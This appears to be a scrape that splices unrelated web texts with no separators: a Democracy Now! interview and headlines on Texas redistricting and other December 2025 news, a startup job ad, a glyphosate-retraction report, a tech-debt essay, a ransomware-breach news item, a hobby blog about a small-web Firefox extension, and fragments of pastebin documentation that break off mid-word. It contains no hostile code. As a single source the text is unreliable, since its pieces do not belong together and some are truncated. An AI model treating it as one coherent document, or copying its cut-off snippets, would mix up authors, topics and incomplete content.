For more, we’re joined by Ari Berman, voting rights correspondent for Mother Jones magazine. His new piece is headlined “The Roberts Court Just Helped Trump Rig the Midterms.” Ari is the author of Minority Rule: The Right-Wing Attack on the Will of the People — and the Fight to Resist It .
Ari Berman, welcome back to Democracy Now! Talk about the significance of this Supreme Court decision yesterday. And what exactly was Samuel Alito’s role?
ARI BERMAN : Good morning, Amy, and thank you for having me back on the show.
So, the immediate effect is that Texas will now be able to use a congressional map that has already been found to be racially gerrymandered and could allow Republicans to pick up five new seats in the midterms. And remember, Texas started this whole gerrymandering arms race, where state after state is now redrawing their maps ahead of the midterms, essentially normalizing something that is deeply abnormal.
It was an unsigned majority opinion, but Samuel Alito wrote a concurrence, basically saying that the Texas map was a partisan map, pure and simple. And remember, Amy, the Supreme Court has already laid the groundwork for Texas to do this kind of thing by essentially saying that partisan gerrymandering cannot be reviewed in federal court, no matter how egregious it is. They have blocked racial gerrymandering in the past, but now, essentially, what they’re allowing to do is they’re allowing Texas to camouflage a racial gerrymander as a partisan gerrymander, and they’ve given President Trump a huge victory in his war against American democracy.
AMY GOODMAN : This overturned a lower court ruling. What are the role of the courts now, with the Supreme Court ruling again and again on this?
ARI BERMAN : Well, basically, what the Supreme Court has done is it’s given President Trump the power of a king, and it’s given itself the power of a monarchy, because what happens is lower courts keep striking down things that President Trump and his party do, including Trump appointees to the lower courts — the Texas redistricting map was struck down by a Trump appointee, who found that it was racially gerrymandered to discriminate against Black and Latino voters. What the Roberts Court did was overturn that lower court opinion, just as it’s overturned so many other lower court opinions to rule in favor of Donald Trump and his party.
And one of the most staggering things, Amy, is the fact that the Roberts Court has ruled for President Trump 90% of the time in these shadow docket cases. So, in all of these big issues, whether it’s on voting rights or immigration or presidential powers, lower courts are constraining the president, and the Supreme Court repeatedly is saying that the president and his party are essentially above the law.
AMY GOODMAN : So, you have talked about the Supreme Court in 2019 ruling in a case, ordered that courts should stay out of disputes over partisan gerrymandering. Tell us more about that.
ARI BERMAN : It was really a catastrophic ruling for democracy, because what it said is that no matter how egregiously a state gerrymanders to try to target a political party, that those claims not only can’t be struck down in federal court, they can’t even be reviewed in federal court. And what that has done is it said to the Texases of the world, “You can gerrymander as much as you want, as long as you say that you’re doing it for partisan purposes.”
So, this whole exercise made a complete mockery of democracy, because Texas goes out there and says, “We freely admit that we are drawing these districts to pick up five new Republican seats.” President Trump says, “We’re entitled to five new seats.” Now, that would strike the average American as absurd, the idea that you could just redraw maps mid-decade to give more seats to your party. But the Supreme Court has basically laid the groundwork for that to be OK.
And even though racial gerrymandering, discriminating against Black and Hispanic voters, for example, is unconstitutional, which is what the lower court found in Texas, the Roberts Court continually has allowed Republicans to get away with this kind of racial gerrymandering by allowing them to just claim that it’s partisan gerrymandering. And that’s what happened once again in Texas yesterday.
AMY GOODMAN : Where does this leave the Voting Rights Act? And for people, especially young people who, you know, weren’t alive in 1965, explain what it says and its importance then.
ARI BERMAN : The Voting Rights Act is the most important piece of civil rights legislation ever passed by the Congress. It quite literally ended the Jim Crow regime in the South by getting rid of the literacy tests and the poll taxes and all the other suppressive devices that had prevented Black people from being able to register and vote in the South for so many years.
It has been repeatedly gutted by the Roberts Court, which has ruled that states with a long history of discrimination, like Texas, no longer have to approve their voting changes with the federal government. The Roberts Court has made it much harder to strike down laws that discriminate against voters of color. And now they are preparing potentially to gut protections that protect people of color from being able to elect candidates of choice.
And I think the Texas ruling is a bad sign, another bad sign, for the Voting Rights Act, because a lower court found that Texas drew these maps to discriminate against Black and Latino voters, that they specifically targeted districts where Black and Latino voters had elected their candidates of choice. And the Supreme Court said, “No, we’re OK with doing it.” So it was yet another example in which the Supreme Court is choosing to protect white power over the power of Black, Latino, Asian American voters.
AMY GOODMAN : So, where does this leave the other cases? You have California’s Prop 50 to redraw the state’s congressional districts, but that was done another way. It was done by a referendum. The people of California voted on it. And then you’ve got North Carolina. You’ve got Missouri. Where does this leave everything before next midterm elections?
ARI BERMAN : Yeah, there’s a lot of activity in the courts so far. A federal court has already upheld North Carolina’s map, which was specifically targeted to dismantle a district of a Black Democrat there. The only district they changed was held by a Black Democrat in the state. In Missouri right now, organizers are trying to get signatures for a referendum to be able to block that district, which also targeted the district of a Black Democrat, Emanuel Cleaver.
California’s law is being challenged by Republicans and by the Justice Department. The Supreme Court did signal, however, in its decision in Texas that they believe that the California map was also a partisan gerrymander, so that that would lead one to believe that if the Supreme Court is going to uphold the Texas map, they would also uphold the California map.
And we’ve also seen repeatedly that there’s double standards for this court, that they allow Republicans to get away with things that they don’t allow Democrats to get away with. They’ve allowed Trump to get away with things that they did not allow Biden to get away with. But generally speaking, it seems like the Supreme Court is going to allow states to gerrymander as much as they want. And that’s going to lead to a situation where American democracy is going to become more rigged and less fair.
AMY GOODMAN : Ari Berman, voting rights correspondent for Mother Jones magazine, author of Minority Rule: The Right-Wing Attack on the Will of the People — and the Fight to Resist It . We’ll link to your piece , “The Roberts Court Just Helped Trump Rig the Midterms.”
Next up, immigration crackdowns continue nationwide. We’ll go to New Orleans, where agents are expected to make 5,000 arrests, and to Minneapolis, as Trump escalates his attacks on the Somali community there, calling the whole community “garbage.” Stay with us.
[break]
AMY GOODMAN : “Ounadikom,” “I Call Out to You,” composed by Ahmad Kaabour at the outbreak of the Lebanese Civil War in 1975 and performed at a Gaza benefit concert on Wednesday by the NYC Palestinian Youth Choir.
The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.
$120K - $200K • 0.25% - 1.00% • New York, NY, US
Role: Engineering, Full stack
Emerge Career’s mission is to break the cycle of poverty and incarceration. We’re not just building software; we’re creating pathways to real second chances. Through an all-in-one platform deeply embedded within the criminal justice system, we recruit, train, and place justice-impacted individuals into life-changing careers.
Our vision is to become the country’s unified workforce development system, replacing disconnected brick-and-mortar job centers with one integrated, tech-powered solution that meets low-income individuals exactly where they are. Today, the federal government spends billions annually on education and training programs, yet only about 70% of participants graduate, just 38.6% secure training-related employment, and average first-year earnings hover around $34,708.
By contrast, our seven-person team has already outperformed the job centers in two entire states (Vermont and South Dakota) in just the past year. With an 89% graduation rate and 92% of graduates securing training-related employment, our alumni aren’t just getting jobs—they’re launching new lives with average first-year earnings of $77,352. The results speak for themselves, and we’re just getting started.
Before Emerge, our founders Zo and Gabe co-founded Ameelio, an award-winning tech nonprofit that is dismantling the prison communication duopoly. Backed by tech luminaries like Reid Hoffman, Vinod Khosla, and Jack Dorsey, and by major criminal-justice philanthropies such as Arnold Ventures and the Mellon Foundation, Ameelio became a recognized leader in the space. Because of this experience both Zo and Gabe understood what it took to create change from within the system. After serving over 1M people impacted by incarceration, they witnessed firsthand the gap in second-chance opportunities and the chronic unemployment plaguing those impacted by the justice system. Emerge Career is committed to solving this issue.
Our students are at the heart of our work. Their journeys have captured national attention on CBS , NBC , and in The Boston Globe , and our programs now serve entire states and cities . And we’re not doing it alone: our vision has attracted support from Alexis Ohanian (776), Michael Seibel, Y Combinator, the Opportunity Fund, and public figures like Diana Taurasi, Deandre Ayton, and Marshawn Lynch. All of us believe that, with the right mix of technology and hands-on practice, we can redefine workforce development and deliver true second chances at scale.
Emerge Career was designed to tackle two systemic issues: recidivism, fueled by post-incarceration unemployment and poverty, and labor shortages in key industries. Over 60% of formerly incarcerated people remain unemployed a year after incarceration, seeking work but not finding it. The reality is shocking: workforce development programs are severely limited inside prison, with only one-third of incarcerated people ever participating. To make matters worse, the available prison jobs offer meager wages, often less than $1 per hour, and often do not equip individuals with the skills for long-term stable employment.
We call this a Founding Design Engineer role—even three years in and with multiple contracts under our belt—for two reasons. First, you’ll be our very first engineer, joining our co-founder, who’s built the entire platform solo to date. Second, our growth is now outpacing our systems, and we can’t keep up on maintenance alone. We’re at a critical juncture: we can either hire someone to simply care for what exists, or we can bring on a talent who believes that, with the right blend of technology and hands-on practice, we can unify the workforce-development system and deliver second chances at true scale. We hope that can be you.
This is not a traditional engineering job. You’ll do high-impact technical work, but just as often you’ll be on the phone with a student, writing documentation, debugging support issues, or figuring out how to turn a one-off solution into a repeatable system. You’ll ship features, talk to users, and fix what’s broken, whether that’s in the product or in the process. You’ll build things that matter, not just things that are asked for.
This role blends engineering, product, support, and program operations. We’re looking for someone who is energized by ownership, obsessed with user outcomes, and excited to work across domains to make things better. If you’re the kind of person who wants to be hands-on with everything—students, code, strategy, and execution—you’ll thrive here.
Bonus Points
Benefits You’ll Receive: link
Start Date: ASAP
A widely cited 2000 study that concluded the well-known herbicide glyphosate was safe has just been officially disavowed by the journal that published it. The listed scientists are suspected of having signed a text actually prepared by Monsanto.
A quarter-century after its publication, one of the most influential research articles on the potential carcinogenicity of glyphosate has been retracted for "several critical issues that are considered to undermine the academic integrity of this article and its conclusions." In a retraction notice dated Friday, November 28, the journal Regulatory Toxicology and Pharmacology announced that the study, published in April 2000 and concluding the herbicide was safe, has been removed from its archives. The disavowal comes 25 years after publication and eight years after thousands of internal Monsanto documents were made public during US court proceedings (the "Monsanto Papers"), revealing that the actual authors of the article were not the listed scientists – Gary M. Williams (New York Medical College), Robert Kroes (Ritox, Utrecht University, Netherlands), and Ian C. Munro (Intertek Cantox, Canada) – but rather Monsanto employees.
Known as "ghostwriting," this practice is considered a form of scientific fraud. It involves companies paying researchers to sign their names to research articles they did not write. The motivation is clear: When a study supports the safety of a pesticide or drug, it appears far more credible if not authored by scientists employed by the company marketing the product.
# API Reference
## Authentication
All write operations require a Bearer token:
```
Authorization: Bearer YOUR_AUTH_KEY
```
## Endpoints
### Create Paste
POST /api
#### JSON Request
```bash
curl
05_api.md
# CLI Reference
## Installation
```bash
npm install -g @pbnjs/cli
```
## Configuration
Run the setup wizard:
```bash
pbnj --init
```
This creates ~/.pbnj with your configuration:
```
PBNJ_HOST=ht
04_cli.md
# Cost Breakdown
"This is deployed on Cloudflare, they might charge us eventually!"
Don't worry. Let's do the math.
## Cloudflare D1 Free Tier
- 500 MB storage
- 5 million reads/day
- 100,000 writ
03_cost.md
# Deployment Guide
## One-Click Deploy (Recommended)
Click the "Deploy to Cloudflare" button on the GitHub repo — that's it!
The deploy button automatically:
- Forks the repo to your GitHub account
02_deployment.md
# Welcome to pbnj
pbnj is a simple, minimal self-hosted pastebin solution.
## What is pbnj?
pbnj lets you share code snippets and text files with a simple URL.
No accounts, no bloat - just paste an
01_welcome.md
# Web Interface
pbnj includes a web interface for creating and managing pastes directly from your browser.
## Authentication
The web interface uses the same `AUTH_KEY` as the CLI and API. Authentic
07_web_interface.md
# Configuration
pbnj is configured through a single `pbnj.config.js` file in the project root.
## Default Configuration
```js
export default {
name: 'pbnj',
logo: '/logo.png',
idStyle: 'sandw
06_configuration.md
I once worked at a company which had an enormous amount of technical debt - millions of lines of code, no unit tests, based on frameworks that were well over a decade out of date. On one specific project, we had a market need to get some Windows-only modules running on Linux, and rather than cross-compiling, another team had simply copied & pasted a few hundred thousand lines of code, swapping Windows-specific components for Linux-specific.
For the non-technical reader, this is an enormous problem because now two versions of the code exist. So, all features & bug fixes must be solved in two separate codebases that will grow apart over time. When I heard about this, a young & naive version of me set out to fix the situation...
Tech debt projects are always a hard sell to management, because even if everything goes flawlessly, the code just does roughly what it did before. This project was no exception, and the optics weren't great. I did as many engineers do and "ignored the politics", put my head down, and got it done. But, the project went long, and I lost a lot of clout in the process.
I realized I was essentially trying to solve a people problem with a technical solution. Most of the developers at this company were happy doing the same thing today that they did yesterday...and five years ago. As Andrew Harmel-Law points out, code tends to follow the personalities of the people that wrote it. The code was calcified because the developers were also. Personality types who dislike change tend not to design their code with future change in mind.
Most technical problems are really people problems. Think about it. Why does technical debt exist? Because requirements weren't properly clarified before work began. Because a salesperson promised an unrealistic deadline to a customer. Because a developer chose an outdated technology because it was comfortable. Because management was too reactive and cancelled a project mid-flight. Because someone's ego wouldn't let them see a better way of doing things.
The core issue with the project was that admitting the need for refactoring was also to admit that the way the company was building software was broken and that individual skillsets were sorely out of date. My small team was trying to fix one module of many, while other developers were writing code as they had been for decades. I had one developer openly tell me, "I don't want to learn anything new." I realized that you'll never clean up tech debt faster than others create it. It is like triage in an emergency room: you must stop the bleeding first, then you can fix whatever is broken.
The project also disabused me of the engineer's ideal of a world in which engineering problems can be solved in a vacuum - staying out of "politics" and letting the work speak for itself - a world where deadlines don't exist...and let's be honest, neither do customers. This ideal world rarely exists. The vast majority of projects have non-technical stakeholders, and telling them "just trust me; we're working on it" doesn't cut it. I realized that the perception that your team is getting a lot done is just as important as getting a lot done.
Non-technical people do not intuitively understand the level of effort required or the need for tech debt cleanup; it must be communicated effectively by engineering - in both initial estimates & project updates. Unless leadership has an engineering background, the value of the technical debt work likely needs to be quantified and shown as business value.
Perhaps these are the lessons that prep one for more senior positions. In my opinion, anyone above senior engineer level needs to know how to collaborate cross-functionally, regardless of whether they choose a technical or management track. Schools teach Computer Science, not navigating personalities, egos, and personal blindspots.
I have worked with some incredible engineers, better than myself - the type that have deep technical knowledge on just about any technology you bring up. When I was younger, I wanted to be that engineer - the "engineer's engineer". But I realize now, that is not my personality. I'm too ADD for that. :)
For all of their (considerable) strengths, more often than not, those engineers shy away from the interpersonal. The tragedy is that they are incredibly productive ICs, but may fail with bigger initiatives because they are only one person - a single processor core can only go so fast. Perhaps equally valuable is the "heads up coder" - the person who is deeply technical, but also able to pick their head up & see project risks coming (technical & otherwise) and steer the team around them.
American pharmaceutical firm Inotiv is notifying thousands of people that their personal information was stolen in an August 2025 ransomware attack.
Inotiv is an Indiana-based contract research organization specializing in drug development, discovery, and safety assessment, as well as live-animal research modeling. The company has about 2,000 employees and an annual revenue exceeding $500 million.
When it disclosed the incident, Inotiv said that the attack had disrupted business operations after some of its networks and systems (including databases and internal applications) were taken down.
Earlier this week, the company revealed in a filing with the U.S. Securities and Exchange Commission (SEC) that it has "restored availability and access" to impacted networks and systems and that it's now sending data breach notifications to 9,542 individuals whose data was stolen in the August ransomware attack.
"Our investigation determined that between approximately August 5-8, 2025, a threat actor gained unauthorized access to Inotiv's systems and may have acquired certain data," it says in letter samples filed with Maine's attorney general .
"Inotiv maintains certain data related to current and former employees of Inotiv and their family members, as well as certain data related to other individuals who have interacted with Inotiv or companies it has acquired."
Inotiv has not yet shared which types of data were stolen during the incident, nor has it attributed the attack to a specific cybercrime operation.
However, the Qilin ransomware group claimed responsibility for the breach in August, leaked data samples allegedly stolen from the company's compromised systems, and said they exfiltrated over 162,000 files totaling 176 GB.
An Inotiv spokesperson has not yet responded to BleepingComputer's request for comment regarding the validity of Qilin ransomware's claims.
Qilin surfaced in August 2022 as a Ransomware-as-a-Service (RaaS) operation under the "Agenda" name and has since claimed responsibility for over 300 victims on its dark web leak site.
Qilin ransomware's list of victims includes high-profile organizations such as automotive giant Yangfeng , Australia's Court Services Victoria , publishing giant Lee Enterprises , and pathology services provider Synnovis .
The Synnovis incident affected several major NHS hospitals in London, forcing them to cancel hundreds of appointments and operations .
I don't like RSS readers. I know, this is blasphemous, especially on a website where I'm actively encouraging you to subscribe through RSS. As someone writing stuff, RSS is great for me: I don't have to think about it, the requests are pretty lightweight, and I don't need to think about your personal data or what client you are using. So as a protocol RSS is great, no notes.
However, as something I'm going to consume, it's frankly a giant chore. I feel pressured by RSS readers, where there is this endlessly growing backlog of things I haven't read. I rarely want to read all of a website's content from beginning to end; instead I like to jump between sites. I also don't really care if the content is chronological; an old post about something interesting isn't less compelling to me than a newer post.
What I want, as a user experience, is something akin to TikTok. The whole appeal of TikTok, for those who haven't wasted hours of their lives on it, is that I get served content based on an algorithm that determines what I might think is useful or fun. However what I would like is to go through content from random small websites. I want to sit somewhere and passively consume random small creators content, then upvote some of that content and the service should show that more often to other users. That's it. No advertising, no collecting tons of user data about me, just a very simple "I have 15 minutes to kill before the next meeting, show me some random stuff."
In this case the "algorithm" is pretty simple: if more people like a thing, more people see it. But with Google on its way to replacing search results with LLM generated content, I just wanted to have something that let me play around with the small web the way that I used to.
There actually used to be a service like this called StumbleUpon which was more focused on pushing users towards popular sites. It has been taken down, presumably because there was no money in a browser plugin that sent users to other websites whose advertising you didn't control.
You can go download the Firefox extension now and try this out and skip the rest of this if you want. https://timewasterpro.xyz/ If you hate it or find problems, let me know on Mastodon. https://c.im/@matdevdug
So I wanted to do something pretty basic. You hit a button, get served a new website. If you like the website, upvote it, otherwise downvote it. If you think it has objectionable content then hit report. You have to make an account (because I couldn't think of another way to do it) and then if you submit links and other people like it, you climb a Leaderboard.
On the backend I want to (very slowly so I don't cost anyone a bunch of money) crawl a bunch of RSS feeds, stick the pages in a database and then serve them up to users. Then I want to track what sites get upvotes and return those more often to other users so that "high quality" content shows up more often. "High quality" would be defined by the community or just me if I'm the only user.
It's pretty basic stuff, most of it copied from tutorials scattered around the Internet. However, I really want to drive home to users that this is not a Serious Thing. I'm not a company, this isn't a new social media network, and there are no plans to "grow" this concept beyond the original idea unless people smarter than me ping me with ideas. So I found this amazing CSS library: https://sakofchit.github.io/system.css/
Apple's System OS design from the late '80s to the early '90s was one of my personal favorites, and I think it sends a strong signal to a user that this is not a professional, modern service.
Great, the basic layout works. Let's move on!
So I ended up doing FastAPI because it's very easy to write. I didn't want to spend a ton of time writing the API because I doubt I nailed the API design on the first round. I use sqlalchemy for the database. The basic API layout is as follows:
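Roughly speaking, it is the shape sketched below. This is an illustrative sketch only; the route names, parameters, and the get_current_user stub are assumptions for this post, not the exact implementation.

# Illustrative sketch only: route names and the auth stub are assumptions.
from fastapi import Depends, FastAPI

app = FastAPI()

def get_current_user():
    # Stub: the real version would decode the JWT from the Authorization header.
    return {"id": 1}

@app.get("/site/random")
def random_site(user=Depends(get_current_user)):
    """Serve a random indexed page, weighted toward well-liked ones."""
    ...

@app.post("/site/{site_id}/vote")
def vote(site_id: int, up: bool, user=Depends(get_current_user)):
    """Record an upvote (up=True) or downvote (up=False) for a page."""
    ...

@app.post("/site/{site_id}/report")
def report(site_id: int, user=Depends(get_current_user)):
    """Flag a page with objectionable content for the review queue."""
    ...

@app.get("/leaderboard")
def leaderboard():
    """Top submitters, ranked by upvotes on the links they submitted."""
    ...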
The source for the RSS feeds came from the (very cool) Kagi small web Github. https://github.com/kagisearch/smallweb . Basically I assume that websites that have submitted their RSS feeds here are cool with me (very rarely) checking for new posts and adding them to my database. If you want the same thing as this does, but as an iFrame, that's the Kagi small web service.
The scraping work is straightforward. A background worker grabs 5 feeds every 600 seconds, checks each feed for new content, and then waits until the 600 seconds have elapsed before grabbing 5 more from the smallweb list of RSS feeds. Since we have a lot of feeds, this ends up looking like we're checking each feed for new content less than once a day, which is the interval that I want.
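A minimal sketch of that loop, assuming feedparser for the RSS parsing (the function and constant names here are illustrative, not the actual code):

# Sketch of the background crawler; feedparser is an assumed dependency.
import time
import feedparser

FEED_BATCH = 5      # feeds checked per cycle
INTERVAL = 600      # seconds per cycle

def crawl_forever(feeds, save_entry):
    """Round-robin through the feed list, FEED_BATCH feeds per INTERVAL window."""
    i = 0
    while True:
        started = time.monotonic()
        for url in feeds[i:i + FEED_BATCH]:
            for entry in feedparser.parse(url).entries:
                save_entry(url, entry.get("link"), entry.get("title"))
        i = (i + FEED_BATCH) % max(len(feeds), 1)
        # Sleep out whatever is left of the 600-second window.
        time.sleep(max(0, INTERVAL - (time.monotonic() - started)))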
Then we write it out to a SQLite database and basically track whether a URL has been reported (if so, it goes into a review queue) and how many times it has been liked or disliked. I considered a "real" database, but honestly SQLite is getting more and more scalable every day and it's impossible to beat the immediate start-up and functionality. Plus it's very easy to back up to encrypted object storage, which is super nice for a hobby project where you might wipe the prod database at any moment.
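The schema is about as small as it sounds; here is a sketch with SQLAlchemy (the column and file names are assumptions, not the production schema):

# Sketch of the page table; column and file names are assumptions.
from sqlalchemy import Boolean, Column, Integer, String, create_engine
from sqlalchemy.orm import declarative_base

Base = declarative_base()

class Page(Base):
    __tablename__ = "pages"
    id = Column(Integer, primary_key=True)
    url = Column(String, unique=True, nullable=False)
    title = Column(String)
    likes = Column(Integer, default=0)
    dislikes = Column(Integer, default=0)
    reported = Column(Boolean, default=False)  # True puts it in the review queue

# A single SQLite file, easy to copy off to encrypted object storage.
engine = create_engine("sqlite:///pages.db")
Base.metadata.create_all(engine)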
In terms of user onboarding I ended up doing the "make an account with an email, I send a link to verify the email" flow. I actually hate this flow and I don't really want to know a user's email. I never need to contact you and there's not a lot associated with your account, which makes this especially silly. I have a ton of email addresses and no real "purpose" in having them. I'd switch to Login with Apple, which is great from a security perspective, but not everybody has an Apple ID.
I also did a passkey version, which worked fine, but the OSS passkey handling is still pretty rough, and most people seem to be using a commercial service to handle the "do you have the passkey? Great, if not, fall back to email" flow. I don't really want to use a big commercial login service for a hobby application.
Auth is a JWT, which actually was a pain and I regret doing it. I don't know why I keep reaching for JWTs, they're a bad user experience and I should stop.
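For what it's worth, the issue/verify round trip is only a few lines with something like PyJWT (an assumed library choice; the post doesn't say which one is used, and the secret and lifetime below are placeholders):

# Minimal JWT issue/verify sketch using PyJWT; secret and lifetime are placeholders.
import datetime
import jwt  # pip install PyJWT

SECRET = "change-me"

def issue_token(user_id: int) -> str:
    payload = {
        "sub": str(user_id),
        "exp": datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=7),
    }
    return jwt.encode(payload, SECRET, algorithm="HS256")

def verify_token(token: str) -> str:
    # Raises jwt.ExpiredSignatureError / jwt.InvalidTokenError on bad tokens.
    return jwt.decode(token, SECRET, algorithms=["HS256"])["sub"]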
I'm more than happy to release the source code once I feel like the product is in a somewhat stable shape. I'm still ripping down and rewriting relatively large chunks of it as I find weird behavior I don't like or just decide to do things a different way.
In the end it does seem to do what's on the label. We have over 600,000 individual pages indexed.
Honestly I've been pretty pleased. But there are some problems.
First, I couldn't find a reliable way of switching the keyboard shortcuts to be Mac/Windows-specific. I found some options for querying the platform, but they didn't seem to work, so I ended up just hardcoding them as Alt, which is not great.
The other issue is that when you are making an extension, you spend a long time working with the manifest.json. The specific part I really wasn't sure about was:
"browser_specific_settings": {
"gecko": {
"id": "[email protected]",
"strict_min_version": "80.0",
"data_collection_permissions": {
"required": ["authenticationInfo"]
}
}
}
I'm not entirely sure if that's all I'm doing? I think so from reading the docs.
Anyway, I built this mostly for me. I have no idea if anybody else will enjoy it. But if you are bored I encourage you to give it a try. It should be pretty lightweight and straightforward if you crack open the extension and look at it. I'm not loading any analytics into the extension, so basically until people complain about it, I don't really know if it's going well or not.
Dec 05, 2025
The Pentagon has announced the U.S. blew up another boat in the eastern Pacific, killing four people. The Pentagon claimed the boat was carrying drugs but once again offered no proof. The U.S. has now killed at least 87 people in 22 strikes on boats since September. This comes as controversy continues to grow over a September 2 strike, when the U.S. targeted and killed two men who had survived an initial attack. Nine people were killed in the first strike. On Thursday, members of Congress were shown video of two men being killed at a time when they were clinging to the side of their overturned boat. Democratic Representative Jim Himes of Connecticut spoke after watching the video.
Rep. Jim Himes: “What I saw in that room was one of the most troubling things I’ve seen in my time in public service. You have two individuals in clear distress without any means of locomotion, with a destroyed vessel, who are killed by the United States.”
Lawmakers also questioned Admiral Frank “Mitch” Bradley, the operation’s commanding officer. Many questions remain over Defense Secretary Pete Hegseth’s role. The Washington Post recently reported Hegseth had ordered Pentagon officials to “kill everybody” on the boat.
Dec 05, 2025
The Pentagon’s inspector general has released its report examining Hegseth’s sharing of sensitive information about U.S. strikes in Yemen on a Signal group chat earlier this year. The report found Hegseth’s actions “created a risk to operational security that could have resulted in failed U.S. mission objectives and potential harm to U.S. pilots.” The report also criticized Hegseth’s use of a personal cellphone to conduct official business. Hegseth himself refused to cooperate with the investigation, declining to hand over his phone or sit for an interview.
Dec 05, 2025
Israel’s military is continuing to pound the Gaza Strip in violation of the October 10 ceasefire agreement. Al Jazeera reports Israeli ships opened fire toward the coast of Khan Younis, while air raids struck the city of Rafah. There are reports of explosions and Israeli artillery fire around Gaza City, including airstrikes near the Maghazi refugee camp.
Meanwhile, a CNN investigation has found the Israeli military fired indiscriminately at starving Palestinians collecting sacks of flour near an aid distribution site near the Zikim crossing in June, then bulldozed their bodies into shallow, unmarked graves, with some bodies left to decompose or be partially eaten by dogs. Gaza officials and the United Nations estimate about 10,000 Palestinians remain missing from Israel’s more than two-year assault, while the official death toll recently passed 70,000.
Dec 05, 2025
Image Credit: 'The Rising Star' Keshet 12
Public broadcasters in Ireland, Slovenia, the Netherlands and Spain said Thursday they will boycott the 2026 Eurovision Song Contest, after the European Broadcasting Union refused to hold a vote on whether to exclude Israel. This is José Pablo López, president of Spain’s national broadcaster.
José Pablo López : “We maintain the same position we had months ago when we said Israel’s participation in the Eurovision festival was untenable for two main reasons, firstly because the genocide it has perpetuated in Gaza. As president of the corporation, I keep thinking that Eurovision is a contest, but human rights are not a contest.”
Eurovision is among the most popular TV and online events in the world; last year, viewers from 156 countries cast votes for their favorite contestants.
Dec 05, 2025
In New Jersey, protesters picketed this morning outside a Jersey City warehouse that is used to transport military cargo to Israel. A recent report by the Palestinian Youth Movement and Progressive International found the warehouse handles over 1,000 tons of Israel-bound military cargo every week, including thousands of MK-84 2,000-pound bombs that have been used to level Gaza.
Dec 05, 2025
The U.S. Supreme Court has cleared the way for Texas to use a new congressional map designed to help Republicans pick up as many as five seats next year. A lower court had previously ruled the redistricting plan was unconstitutional because it would likely dilute the political power of Black and Latino voters. Liberal Supreme Court Justice Elena Kagan wrote in her dissent, “This court’s stay ensures that many Texas citizens, for no good reason, will be placed in electoral districts because of their race. And that result, as this court has pronounced year in and year out, is a violation of the constitution.”
Dec 05, 2025
The FBI has arrested a 30-year-old man from Virginia for allegedly planting pipe bombs near the Republican and Democratic National Committee headquarters in January 2021 — on the night before the January 6 insurrection at the U.S. Capitol. The suspect, Brian Cole, is expected to appear in court today.
Dec 05, 2025
The Justice Department has asked a judge to rejail a participant in the January 6 insurrection who had been pardoned by President Trump. The Justice Department made the request after the man, Taylor Taranto, showed up near the home of Democratic Congressmember Jamie Raskin, who served on the January 6 House Select Committee. Security has been increased for Raskin. In October, Taranto was sentenced to time served for making a threat near the home of former President Obama.
Dec 05, 2025
A federal grand jury in Virginia has declined a second attempt by the Justice Department to indict New York Attorney General Letitia James on charges that she lied in her mortgage application. In a statement, Letitia James wrote, “As I have said from the start, the charges against me are baseless. It is time for this unchecked weaponization of our justice system to stop.” It’s the latest defeat to President Trump’s campaign of retribution against his political enemies. The Trump administration is reportedly considering a third attempt to obtain an indictment against James.
Dec 05, 2025
Image Credit: New Orleans City Council
In New Orleans, about 30 activists were ejected from a City Council meeting Thursday after calling for “ICE-free zones” and asking local leaders to do more to protect immigrants. During a public comment period, members of the public went to the microphone one by one and were cut off when it became clear they wanted to speak on immigration, which wasn’t on the formal agenda.
Brittany Cary: “And I’m asking City Council for ICE-free zones. Make all city-owned property ICE-free zones, and prohibit ICE and DHS from using city property to stage their operations. No collaboration with ICE. City Council must pass ordinances that codify noncollaboration” —
Chair: “Ma’am?”
Brittany Cary: — “between the city of New Orleans and ICE, including all of its offices and” —
Chair: “As I stated previously, that is not germane. Thank you for your comments.”
The protests came as the Border Patrol announced a surge of more than 200 federal immigration agents into New Orleans, which the agency is calling “Operation Catahoula Crunch.” They aim to make 5,000 arrests over two months. We’ll go to New Orleans later in the broadcast.
Dec 05, 2025
Honduran presidential candidate Salvador Nasralla has alleged fraud after his conservative rival Nasry Asfura regained the lead, as election officials continue to tally up votes from Sunday’s election. Nasralla also accused President Trump of interfering in the race by publicly backing Asfura. Some election officials have also publicly criticized the election process. On Thursday, Marlon Ochoa, who serves on Honduras’s National Electoral Council, decried what she called an electoral “coup.” She said, “I believe there is unanimity among the Honduran people that we are perhaps in the least transparent election in our democratic history.”
Dec 05, 2025
President Trump welcomed the leaders of the Democratic Republic of Congo and Rwanda to Washington, D.C., Thursday for the signing of an agreement aimed at ending decades of conflict in the eastern DRC . Trump also announced the U.S. had agreed to bilateral deals that will open the African nations’ reserves of rare earth elements and other minerals to U.S. companies. The signing ceremony was held in the newly renamed Donald J. Trump Institute of Peace.
Dec 05, 2025
During Thursday’s event, Trump struggled to keep his eyes open. This follows other recent public appearances where Trump appeared to fall asleep at times. And once again, Trump was spotted wearing bandages on his right hand, which appeared bruised and swollen. That fueled further speculation about the president’s health. On Monday, the White House said the results from Trump’s recent MRI exam were “perfectly normal,” after Trump was unable to tell reporters aboard Air Force One what part of his body was scanned.
Reporter: “What part of your body was the MRI looking at?”
President Donald Trump: “I have no idea. It was just an MRI. What part of the body? It wasn’t the brain, because I took a cognitive test, and I aced it. I got a perfect mark, which you would be incapable of doing. Goodbye, everybody. You, too.”
Dec 05, 2025
In business news, Netflix has announced it will buy Warner Bros. in a deal worth at least $72 billion. The deal could reshape the entertainment and media industry, as it will give Netflix control of Warner’s movie and TV studios, as well as the HBO Max streaming service.
Dec 05, 2025
Image Credit: X/@FightForAUnion
In labor news, a dozen striking Starbucks workers were arrested in New York City Thursday as they blocked the doors to the Empire State Building, where Starbucks has a corporate office. Starbucks workers at over 100 stores are on strike.
Dec 05, 2025
A University of California student has been ordered to serve 90 days in jail for breaking into a Sonoma County poultry slaughterhouse and freeing four chickens. Twenty-three-year-old Zoe Rosenberg of Berkeley received the sentence on Wednesday, after a jury convicted her in October of felony conspiracy and three misdemeanor counts. She was ordered to pay more than $100,000 to Petaluma Poultry, which is owned by the agribusiness giant Perdue Farms. Rosenberg’s supporters with the group Direct Action Everywhere say the chickens she rescued were worth $24; they’re reportedly alive and well at a sanctuary for rescued farm animals. Rosenberg told supporters her action was prompted by investigations that found routine violations of California’s animal cruelty laws at Petaluma Poultry slaughterhouses.
